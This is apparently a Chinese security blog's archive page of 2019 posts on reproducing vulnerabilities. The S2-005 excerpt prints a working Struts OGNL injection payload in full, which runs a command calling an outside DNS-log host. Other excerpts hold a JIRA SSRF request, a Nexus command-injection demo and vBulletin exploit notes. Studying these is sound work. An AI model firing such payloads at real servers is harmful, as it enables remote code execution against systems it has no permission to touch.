October 11, 2019
Double Dragon: The Spy Who Fragged Me
September 27, 2019
S2-005 payload 分析 原始 payload (%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22))) &(asdf)((‘%5cu0023rt.exec(%22ping@-c@3@ijtrsivzwnreezte.send.jiance.qianxin.com%22.split(%22@%22))’)(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1 URLDecode (‘\u0023_memberAccess[\’allowStaticMethodAccess\’]’)(vaaa)=true&(aaaa)((‘\u0023context[\’xwork.MethodAccessor.denyMethodExecution\’]\u003d\u0023vccc’)(\u0023vccc\u003dnew java.lang.Boolean("false")))&(asdf)((‘\u0023rt.exec("ping@-c@3@ijtrsivzwnreezte.dnslog.com".split("@"))’)(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1 Unicode string escape (‘#_memberAccess[\’allowStaticMethodAccess\’]’)(vaaa)=true& (aaaa)( (‘#context[\’xwork.MethodAccessor.denyMethodExecution\’]=#vccc’) (#vccc=new java.lang.Boolean("false")) )& (asdf)( (‘#rt.exec("ping@-c@3@ijtrsivzwnreezte.dnslog.com".split("@"))’) (#rt=@java.lang.Runtime@getRuntime()) )=1 开始修改 (‘\u0023_memberAccess[\’allowStaticMethodAccess\’]’)(vaaa)=true& (aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))& (aabb)( (‘#outstr.close()’) (‘#outstr.print("888888")’) (‘#outstr.println("webpath")’) (‘#outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter()’) ) 修改状态2 (%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(aabb)((‘\u0023outstr.close()’)(‘\u0023outstr.print("888888")’)(‘\u0023outstr.println("webpath")’)(‘\u0023outstr\u003d@org.apache.struts2.ServletActionContext@getResponse().getWriter()’))=1
September 27, 2019
如何使用 Collaborator Everywhere <!–more–> 使用方法 https://github.com/PortSwigger/collaborator-everywhere 注意,要现在 scope 中设置范围, collaborator-everywhere 之后才会工作,且只对范围内的请求,修改/添加 HTTP 请求头。 捕获到的请求 GET /wp-content/uploads/2018/05/138-140FP91001-1024×640.jpg HTTP/1.1 Host: wp.blkstone.me User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@hvgwzou2c52d11kl8cd4nr16yx4r8fx.burpcollaborator.net Accept: image/webp,*/* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: http://3gkikafoxrnzmn57tyyq8dmsjjpdn1c.burpcollaborator.net/ref If-Modified-Since: Sat, 19 May 2018 09:49:59 GMT If-None-Match: "19f18-56c8bfdde1fc0" Cache-Control: no-transform X-Wap-Profile: […]
September 25, 2019
渗透测试之业务流量通用抓包方法及自动化漏洞扫描 <!–more–> 正文 https://mp.weixin.qq.com/s/vBo6GXQLW2Oo0nq1DVzSuw
September 25, 2019
CVE-2019-16759 vBulletin 5.x pre-auth RCE exploit <!–more–> 参考资料 vBulletin 5.x 0day pre-auth RCE exploit https://seclists.org/fulldisclosure/2019/Sep/31 vBulletin 5.x 前台代码执行漏洞分析 -【CVE-2019-16759】 https://xz.aliyun.com/t/6419 vBulletin zero-day exploited in the wild in wake of exploit release https://www.helpnetsecurity.com/2019/09/25/cve-2019-16759/ 环境搭建 (复杂) https://github.com/asosso/docker-vbulletin # 先确认编译工具链足够齐全 yum -y install gcc install autoconf automake libtool # 之后安装 php 扩展依赖 yum install -y php php-mysql php-curl […]
September 25, 2019
CVE-2019-8451 JIRA Pre-auth SSRF <!–more–> 正文 sudo docker pull cptactionhank/atlassian-jira:7.8.0 sudo docker run –detach –publish 8080:8080 cptactionhank/atlassian-jira:7.8.0 http://24mail.chacuo.net/ 注册一个 JIRA 账户,申请试用 lisence,开启 JIRA 实例。 HTTP 请求与响应示例 请求 GET /plugins/servlet/gadgets/makeRequest?url=http://192.168.198.133:8080@test101.ff16ff.ceye.io HTTP/1.1 Host: 192.168.198.133:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.198.133:8080/secure/Dashboard.jspa X-Atlassian-Token: no-check […]
September 23, 2019
CVE-2019-5475 Nexus2 yum插件RCE漏洞复现 <!–more–> 参考资料 【漏洞分析】CVE-2019-5475:Nexus 2 yum插件远程命令执行漏洞 https://mp.weixin.qq.com/s/E_BEp-yYKtIYAnQ6JP7fmg CVE-2019-5475:Nexus2 yum插件RCE漏洞复现 https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247483738&idx=1&sn=6bce2bf153ab0a07c01f746d479644d4&scene=0#wechat_redirect 环境搭建 (以 windows 为例) 1 下载 Nexus-2.14.13 https://download.sonatype.com/nexus/oss/nexus-2.14.13-01-bundle.zip 2 (管理员权限)运行 bin/jsw/windows-x86-64/install-nexus.bat 3 (管理员权限)运行 bin/jsw/windows-x86-64/start-nexus.bat 【启动速度比较慢请耐心等待】 调试参考 https://blog.csdn.net/nthack5730/article/details/51082270 4 访问 http://localhost:8081/nexus 验证服务是否启动 (默认密码 admin/admin123) PoC 漏洞需要管理员权限,属于 after-auth RCE / 后台 getshell。 一个 tasklist 的 demo C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\System32\\tasklist.exe & 原始 HTTP 请求 PUT /nexus/service/siesta/capabilities/00014aeb0e511dc9 […]
September 22, 2019
Fuzzit <!–more–> 正文 https://github.com/fuzzitdev/fuzzit